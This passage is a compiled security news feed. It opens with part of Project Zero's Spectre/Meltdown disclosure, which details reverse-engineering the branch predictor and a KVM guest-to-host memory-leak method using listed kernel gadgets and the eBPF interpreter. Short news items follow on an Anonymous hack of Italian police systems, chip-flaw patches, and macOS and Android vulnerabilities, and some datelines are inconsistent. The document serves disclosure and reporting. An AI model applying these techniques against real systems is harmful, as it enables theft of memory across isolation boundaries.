Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of information probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.
Reading host memory from a KVM guest
Locating the host kernel
Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

lower 20 bits of the address of kvm-intel.ko
full address of kvm.ko
full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.
Identifying cache sets
The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].
Locating the host-virtual address of a guest page
Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

To brute-force the physical address, the following gadget can be used:

ffffffff810a9def: 4c 89 c0 mov rax,r8
ffffffff810a9df2: 4d 63 f9 movsxd r15,r9d
ffffffff810a9df5: 4e 8b 04 fd c0 b3 a6 mov r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc: 81
ffffffff810a9dfd: 4a 8d 3c 00 lea rdi,[rax+r8*1]
ffffffff810a9e01: 4d 8b a4 00 f8 00 00 mov r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08: 00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.
Cache set selection
To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.
Leaking data
At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.

The eBPF interpreter provides, among other things:

multiple emulated 64-bit registers
64-bit immediate writes to emulated registers
memory reads from addresses stored in emulated registers
bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd: 4c 89 ce mov rsi,r9
ffffffff81514ee0: 41 ff 90 b0 00 00 00 call QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.
Variant 3: Rogue data cache load
Basically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

We do have a few additions to make to Anders Fogh's blogpost:

"Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, [...]"

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.
Ideas for further research
We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.
Leaking without data cache timing
It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.
Other microarchitectures
Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.
Other JIT engines
We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.
More efficient scanning for host-virtual addresses and cache sets
In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.
Dumping the complete BTB state
Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.
Variant 2: Leaking with more efficient gadgets
If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.
Various speedups
In particular the variant 2 PoC is still a bit slow. This is probably partly because:

It only leaks one bit at a time; leaking more bits at a time should be doable.
It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.
Leaking or injection through the return predictor
If the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.
Leaking data out of the indirect call predictor
We have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.
Vendor statements
The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:
Intel
No current statement provided at this time.
AMD
AMD provided the following link: http://www.amd.com/en/corporate/speculative-execution
ARM
Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.
Literature
Note that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to it may not reflect the latest version of Intel's documentation.

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
"Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
"Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
"Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
"if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
"Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
https://www.jilp.org/: This journal contains many articles on branch prediction.
http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.


Anonymous Italia hacked speed camera database and took over the police systems in Correggio
4.1.2017 securityaffairs Hacking

Anonymous Italy hacked and deleted the entire speed camera database and took over the police email and database system in Correggio.
Last week, Anonymous hacked a Speed Camera Database in Italy, the hacktivists took control of a local police computer system in Correggio, Italy and erased the entire archive containing speed camera tickets. According to Gazzetta di Reggio, the hackers also released internal emails and documents.

Anonymous%20Italy%20speed%20camera%20database

The hackers provided screenshots of the attack to several Italian newspapers, it seems they have wiped an entire archive containing 40 gigabytes worth of infringement photographs.

Anonymous%20Italy%20speed%20camera%20database

The Anonymous hackers sent a message using the e-mail account of the Correggio municipal police.

“Ho Ho Ho, Merry Christmas,” read the message from Anonymous.

The message announced the hack of the Concilia database and of the system developed by the company Verbatel, it also included the links and passwords to download them.

The message includes screenshots of the hack, one of them show a Windows command line likely related to the hacked computer of the Correggio municipal police.

Two images show claims from two motorists complaining that they received tickets from Correggio speed cameras, even though they had never passed through the area.

Emails between police administrators and local politicians discussed how the speed camera profits were to be distributed.

One of the screenshots is related to an email sent by an employee at Correggio data center who explains that he has restored the Concilia DB using a backup dated Dec. 5 due to a serious problem.

The police are still investigating the case.


Meltdown and Spectre CPU Flaws Affect Intel, ARM, AMD Processors
4.1.2017 thehackernews
Vulnerebility

Unlike the initial reports suggested about Intel chips being vulnerable to some severe ‘memory leaking’ flaws, full technical details about the vulnerabilities have now been emerged, which revealed that almost every modern processor since 1995 is vulnerable to the issues.
Disclosed today by Google Project Zero, the vulnerabilities potentially impact all major CPUs, including those from AMD, ARM, and Intel—threatening almost all PCs, laptops, tablets, and smartphones, regardless of manufacturer or operating system.
These hardware vulnerabilities have been categorized into two attacks, named Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could allow attackers to steal sensitive data which is currently processed on the computer.
Both attacks take advantage of a feature in chips known as "speculative execution," a technique used by most modern CPUs to optimize performance.
"In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions," Project Zero says.
Therefore, it is possible for such speculative execution to have "side effects which are not restored when the CPU state is unwound and can lead to information disclosure," which can be accessed using side-channel attacks.
Meltdown Attack

 

Meltdown Attack papers  Spectre attack papers

The first issue, Meltdown (paper), allows attackers to read not only kernel memory but also the entire physical memory of the target machines, and therefore all secrets of other programs and the operating system.
“Meltdown is a related microarchitectural attack which exploits out-of-order execution in order to leak the target’s physical memory.”
Meltdown uses speculative execution to break the isolation between user applications and the operating system, allowing any application to access all system memory, including memory allocated for the kernel.
“Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.”
Nearly all desktop, laptop, and cloud computers affected by Meltdown.
Spectre Attack

The second problem, Spectre (paper), is not easy to patch and will haunt people for quite some time since this issue requires changes to processor architecture in order to fully mitigate.
Spectre attack breaks the isolation between different applications, allowing the attacker-controlled program to trick error-free programs into leaking their secrets by forcing them into accessing arbitrary portions of its memory, which can then be read through a side channel.
Spectre attacks can be used to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.
“In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.” the paper explains.
“KAISER patch, which has been widely applied as a mitigation to the Meltdown attack, does not protect against Spectre.”
According to researchers, this vulnerability impacts almost every system, including desktops, laptops, cloud servers, as well as smartphones—powered by Intel, AMD, and ARM chips.
What You Should Do: Mitigations And Patches
Many vendors have security patches available for one or both of these attacks.
Windows — Microsoft has issued an out-of-band patch update for Windows 10, while other versions of Windows will be patched on the traditional Patch Tuesday on January 9, 2018
MacOS — Apple had already fixed most of these security holes in macOS High Sierra 10.13.2 last month, but MacOS 10.13.3 will enhance or complete these mitigations.
Linux — Linux kernel developers have also released patches by implementing kernel page-table isolation (KPTI) to move the kernel into an entirely separate address space.
Android — Google has released security patches for Pixel/Nexus users as part of the Android January security patch update. Other users have to wait for their device manufacturers to release a compatible security update.
Mitigations for Chrome Users
Since this exploit can be executed through the website, Chrome users can turn on Site Isolation feature on their devices to mitigate these flaws.
Here's how to turn Site Isolation on Windows, Mac, Linux, Chrome OS or Android:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labeled Enable.
Once done, hit Relaunch Now to relaunch your Chrome browser.
There is no single fix for both the attacks since each requires protection independently.


Huge Flaws Affect Nearly Every Modern Device; Patch Could Hit CPU Performance
4.1.2017 thehackernews
Vulnerebility


UPDATE: Researchers have finally disclosed complete technical details of two kernel side-channel attacks, Meltdown and Spectre—which affect not only Intel but also systems and devices running AMD, ARM processors—allowing attackers to steal sensitive data from the system memory.
____________
The first week of the new year has not yet been completed, and very soon a massive vulnerability is going to hit hundreds of millions of Windows, Linux, and Mac users worldwide.
According to a blog post published yesterday, the core team of Linux kernel development has prepared a critical kernel update without releasing much information about the vulnerability.
Multiple researchers on Twitter confirmed that Intel processors (x86-64) have a severe hardware-level issue that could allow attackers to access protected kernel memory, which primarily includes information like passwords, login keys, and files cached from disk.
The security patch implements kernel page-table isolation (KPTI) to move the kernel into an entirely separate address space and keeps it protected and inaccessible from running programs and userspace, which requires an update at the operating system level.
"The purpose of the series is conceptually simple: to prevent a variety of attacks by unmapping as much of the Linux kernel from the process page table while the process is running in user space, greatly hindering attempts to identify kernel virtual address ranges from unprivileged userspace code," writes Python Sweetness.
It is noteworthy that installing the update will hit your system speed negatively and could bring down CPUs performance by 5 percent to 30 percent, "depending on the task and processor model."
"With the page table splitting patches merged, it becomes necessary for the kernel to flush these caches every time the kernel begins executing, and every time user code resumes executing."
Much details of the flaw have been kept under wraps for now, but considering its secrecy, some researchers have also speculated that a Javascript program running in a web browser can recover sensitive kernel-protected data.
AMD processors are not affected by the vulnerability due to security protections that the company has in place, said Tom Lendacky, a member of the Linux OS group at AMD.
"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against," the company said.
"The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."
The Linux patch that is being released for ALL x86 processors also includes AMD processors, which has also been considered insecure by the Linux mainline kernel, but AMD recommends specifically not to enable the patch for Linux.
Microsoft is likely to fix the issue for its Windows operating system in an upcoming Patch Tuesday, and Apple is also likely working on a patch to address the vulnerability.


Intel, AMD Chip Vulnerabilities Put Billions of Devices at Risk
4.1.2018 securityweek
Attack
Details of "Meltdown" and "Spectre" Attacks Against Intel and AMD Chips Disclosed

Researchers have disclosed technical details of two new attack methods that exploit critical flaws in CPUs from Intel, AMD and other vendors. They claim billions of devices are vulnerable, allowing malicious actors to gain access to passwords and other sensitive data without leaving a trace.

There have been reports in the past few days about a critical flaw in Intel CPUs that allows an attacker to gain access to kernel space memory. It turns out that there are actually two different attacks and researchers say one of them impacts AMD and ARM processors as well.

AMD representatives have claimed that their products are not vulnerable, which has contributed to the company’s stock going up 7 percent. Intel released a statement saying that the vulnerabilities are not unique to its products after its shares lost 4 percent in value.

Meltdown and Spectre

The side-channel attacks, dubbed Meltdown and Spectre by researchers, allow malicious applications installed on a device to access data as it’s being processed. This can include passwords stored in a password manager or web browser, photos, documents, emails, and data from instant messaging apps.

Attacks can be launched not only against PCs, but also mobile devices and cloud servers. While there is no evidence of exploitation in the wild, researchers pointed out that the attacks don’t leave any traces in traditional log files and they are unlikely to be detected by security products – although security products may detect the malware that launches Meltdown and Spectre.

Meltdown was discovered independently by Jann Horn of Google Project Zero, researchers from Cyberus Technology, and a team from the Graz University of Technology in Austria. Spectre was found independently by Horn, and a group of experts from various universities and companies. Technical papers and proof-of-concept (PoC) code have been published for each of the attack methods, and Intel, Microsoft, ARM and Google Project Zero are expected to publish their own advisories.

Memory isolation mechanisms found in modern computer systems should normally prevent applications from reading or writing to kernel memory or accessing the memory of other programs. However, the Meltdown and Spectre attacks bypass these protections.Meltdown

Meltdown, named so because it “melts” security boundaries normally enforced by hardware, can be leveraged to read arbitrary kernel memory locations. A malicious unprivileged app can use it to read memory associated with other programs and even virtual machines in cloud environments. The vulnerability behind Meltdown is tracked as CVE-2017-5754.

Researchers say it’s unclear if Meltdown affects ARM and AMD processors, but it has been confirmed to impact nearly every Intel processor made since 1995, specifically CPUs that implement a system known as out-of-order execution.

Spectre, on the other hand, has been confirmed to affect not just Intel, but also AMD and ARM processors. However, AMD claims there is a “near zero risk” to its processors due to their architecture.

Desktops, laptops, smartphones and cloud servers are impacted, but the vulnerability is more difficult to exploit compared to Meltdown.

The attack has been named Spectre because its root cause is speculative execution and it will “haunt us for quite some time” due to the fact that it’s not easy to fix. The CVE identifiers CVE-2017-5753 and CVE-2017-5715 have been assigned to Spectre.Spectre

Spectre breaks isolation between different applications and it allows an attacker to trick programs that follow best practices to leak secrets stored in their memory.

“Meltdown breaks the mechanism that keeps applications from accessing arbitrary system memory. Consequently, applications can access system memory,” researchers explained. “Spectre tricks other applications into accessing arbitrary locations in their memory. Both attacks use side channels to obtain the information from the accessed memory location.”

Mitigations

Meltdown attacks can be prevented using kernel page table isolation (KPTI), a hardening technique designed to improve security by isolating the kernel space from user space memory. It’s based on the KAISER system developed last year by a team of researchers at Graz University.

KPTI has already been implemented in the Linux kernel and Microsoft has been working on a similar system for Windows. Apple is also said to be working on patches for macOS.

Cloud providers that use Intel CPUs and Xen paravirtualization are impacted. Amazon Web Services (AWS) and Microsoft Azure have been working on patches and they have informed customers that cloud instances will need to be rebooted in the upcoming days to apply security patches.

Google has addressed the vulnerabilities in its Cloud products and services. The company pointed out that while attacks are not easy to launch against Android devices, the latest Android security updates do provide additional protection.

Spectre attacks are more difficult to block. However, researchers say it’s possible to prevent specific known exploits using software patches.

Intel addresses concerns of performance penalties introduced by mitigations

Since KPTI has already been implemented in the Linux kernel before the disclosure – this actually led to experts figuring out that there was a serious vulnerability in Intel CPUs – several tests have been conducted to determine the impact of the mitigation on performance.

The researchers who developed the KAISER method reported a negative impact of only 0.28 percent on performance, but tests conducted now showed that performance penalties can reach as much as 30 percent, depending on what types of operations are being conducted.

Michael Schwartz, one of the researchers involved in the discovery of the Meltdown and Spectre vulnerabilities, has confirmed for SecurityWeek that there definitely can be a significant performance penalty for certain types of workloads.

“We ran some benchmarks on our initial KAISER implementation which showed only small performance impacts on modern CPUs. However, we guess that the performance penalties reported by other people (something between 5% - 30%) are realistic on older CPUs and unusual workload (e.g., many syscalls),” Schwartz said.

Intel has reassured customers that any performance impacts are workload-dependent and they should not be significant for the average user. Furthermore, the chip maker says performance impact will be mitigated over time.


Apple Working on Patch for New Year's Eve macOS Flaw
4.1.2018 securityweek Apple
Apple is aware of the macOS vulnerability disclosed by a researcher on New Year’s Eve and the company plans on patching it later this month.

A security expert who uses the online moniker Siguza has made public the details and proof-of-concept (PoC) code for a local privilege escalation vulnerability affecting all versions of the macOS operating system.

The flaw, which the researcher described as a “zero day,” allows a malicious application installed on the targeted system to execute arbitrary code and obtain root privileges.

Apple is working on patching the vulnerability and has shared some mitigation advice until the fix becomes available.

“Apple is committed to the security of our customers’ devices and data, and we plan to patch this issue in a software update later this month,” Apple said in a statement emailed to SecurityWeek. “Since exploiting the vulnerability requires a malicious app to be loaded on your Mac, we recommend downloading software only from trusted sources such as the Mac App Store.”

The flaw affects IOHIDFamily, a kernel extension designed for human interface devices (e.g. touchscreens and buttons). Siguza discovered that some security bugs in this component introduce a kernel read/write vulnerability, which he has dubbed IOHIDeous.

The exploit created by the hacker also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features.

The PoC exploit is not stealthy as it needs to force a logout of the legitimate user. However, the researcher said an attacker could design an exploit that is triggered when the targeted device is manually rebooted or shut down.

Some of the PoC code made available by Siguza only works on macOS High Sierra 10.13.1 and earlier, but the researcher believes it can be adapted for version 10.13.2 as well.

The vulnerability has been around since at least 2002, but it could actually be much older.

Siguza says he is not concerned that malicious actors will abuse his PoC exploit as the vulnerability is not remotely exploitable. The hacker claims he would have privately disclosed the flaw to Apple had it been remotely exploitable or if the tech giant’s bug bounty program covered macOS.


Google Patches Multiple Critical, High Risk Vulnerabilities in Android
4.1.2018 securityweek Android
Google patched several Critical and High severity vulnerabilities as part of its Android Security Bulletin for January 2018.

A total of 38 security flaws were resolved in the popular mobile OS this month, 20 as part of the 2018-01-01 security patch level and 18 in the 2018-01-05 security patch level. Five of the bugs were rated Critical and 33 were rated High risk.

Four of the vulnerabilities addressed with the 2018-01-01 security patch level were rated Critical, all of them remote code execution bugs. The remaining 16 issues resolved in this patch level were High risk elevation of privilege and denial of service vulnerabilities.

An elevation of privilege bug that Google patched in Android runtime could be exploited remotely to bypass user interaction requirements in order to gain access to additional permissions.

The most severe of the 15 vulnerabilities resolved in Media framework could allow an attacker using a specially crafted malicious file to execute arbitrary code within the context of a privileged process. These include 3 Critical remote code execution bugs, 4 High severity elevation of privilege issues, and 8 High risk denial of service flaws.

One other Critical remote code execution bug was patched in System, along with two High severity elevation of privilege flaws and one High risk denial of service vulnerability.

Only one of the flaws fixed with the 2018-01-05 security patch level was a Critical vulnerability. Along with 6 High severity flaws, it was affecting Qualcomm closed-source components.

The patch level also resolved a High risk denial of service issue in HTC components and High risk elevation of privilege bugs in LG components, Media framework, MediaTek components, and NVIDIA components (one in each).

The security patch level addressed three High severity elevation of privilege and one information disclosure bug in Kernel components, along with two High risk elevation of privilege vulnerabilities in Qualcomm components.

Google also resolved 46 vulnerabilities in Google devices as part of the Pixel / Nexus Security Bulletin—January 2018. Most of the flaws were rated Moderate severity, exception making issues addressed in Media framework (some were rated Low risk and others were rated High severity on older Android versions).

Impacted components included Framework (1 vulnerability), Media framework (16 vulnerabilities), System (1 flaw), Broadcom components (1 issue), HTC components (1 flaw), Kernel components (7 bugs), MediaTek components (1 issue), and Qualcomm components (18 vulnerabilities).

In addition to patching security flaws, the security bulletin also addressed functionality issues on Pixel devices. The update adjusted the handling of key upgrades in keystore and improved stability and performance after installing an OTA.

On Google devices, all of these issues are fixed as part of the security patch levels of 2018-01-05 or later.


Devices Running GoAhead Web Server Prone to Remote Attacks
4.1.2018 securityweek
Attack
A vulnerability affecting all versions of the GoAhead web server prior to version 3.6.5 can be exploited to achieve remote code execution (RCE) on Internet of Things (IoT) devices.

